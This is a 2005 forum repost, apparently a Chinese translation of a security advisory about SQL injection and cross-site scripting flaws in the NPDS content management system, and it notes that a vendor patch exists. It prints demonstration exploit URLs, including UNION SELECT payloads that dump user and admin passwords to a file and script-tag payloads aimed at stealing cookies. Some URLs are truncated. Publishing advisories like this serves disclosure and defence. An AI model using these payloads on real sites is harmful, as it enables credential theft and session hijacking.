邪恶八进制信息安全团队技术讨论组 » 重要安全公告{ Security Advisory Bulletin } » 漏洞分析[ Vulnerability Analyse ] » [翻译]NPDS的'glossaire' 组件和连接、查询脚本存在SQL注入漏洞和 [查看完整版本]

hak_ban[HSG] 2005-6-1 10:38

[翻译]NPDS的'glossaire' 组件和连接、查询脚本存在SQL注入漏洞和

资料翻译：  fpx[BCT]
翻译网站:  Bug.Center.Team [url]http://www.cnbct.org[/url]
SecurityTracker ID:  1014073
CVE 叁考:  GENERIC-MAP-NOMATCH  
日期:    2005 年5月 29 日

影响:攻击者通过网络可以得到系统信息、用户信息，并可修改用户信息。
厂商确认:  是的

摘要:  NoSP、Romano 公布NPDS存在一个漏洞。 远程攻击者可以进行SQL注入和跨站攻击。原因是一些特殊脚本设置不当，远程攻击者可以通过构造特殊参数执行SQL指令。
'/ modules/glossaire/glossaire.php' 默认脚本中'terme'变量过滤不严。

漏洞示范：
http://[target]/modules.php?ModPath=glossaire&ModStar t=glossaire&op=rech_terme&type=3&terme=''%20='%20AND%20affiche!='0'%20UNION%20SELECT%200,

http://[target]/modules.php?ModPath=glossaire&ModStart=glossaire&op=rech_term e&type=3&terme=''%20='%20AND%20affiche!='0'%20UNION%20SELECT%200,

The 'links.php?op=search' script does not properly validate user-supplied input in the 'query' parameter. Some demonstration exploit URLs are provided:

http://[target]/links.php?op=search&query=google%&#39;%20UNION%20SELECT%200,un ame,pass,0,0,0,0,0%20FROM%20users%20where%20uname<>&#39;&#39;%20INTO%20OUTFILE%20&#39;

http://[target]/links.php?op=search&query=google%&#39;%20UNION%20SELECT%200,aid,pwd,0,0,0,0,0%20 FROM%20authors%20where%20aid<>&#39;&#39;%20INTO%20OUTFILE%20&#39;/va

远程攻击者也可以通过跨站脚本攻击，取得管理员，用户cookies。
漏洞示范:

http://[target]/npds/admin.php?mainfile=e&language=<script>alert(document.cookie);</script>

http://[target]/npds/powerpack_f.php?language=<script>aler t()</script>

http://[target]/npds/sdv_infos.php?sitename=<script>alert()</script>

http://[target]/faq.php?myfaq=ys&id_cat=99&categories=<script>alert()</script>

http://[target]/modules.php?ModPath=glossaire&ModStart=glossaire&op=rech_lettre&lettre=<script>alert()</script>

http://[target]/reviews.php?op=postcomment&id=1&title=% 3Cscript%3Ealert();%3C/script%3E

The &#39;reply.php&#39; script does not properly validate user-supplied input in the &#39;image_subject&#39; parameter. A remote user can inject scripting code that will be permanently retained on the system.

http://[target]/reply.php?post=1&forum=1&topic=1&stop=2&image_sub ject="><script>alert(&#39;je viens de recuperer ton
cookie&#39;);</script>&userdata=&#39;&time=&#39;&poster_ip=&#39;&hostname=&#39;&message=test&submit=Valider


解决:  厂商已经发布补丁:

厂商网址:  [url]www.npds.org[/url]

查看完整版本: [翻译]NPDS的&#39;glossaire&#39; 组件和连接、查询脚本存在SQL注入漏洞和

© 1999-2008 EvilOctal Security Team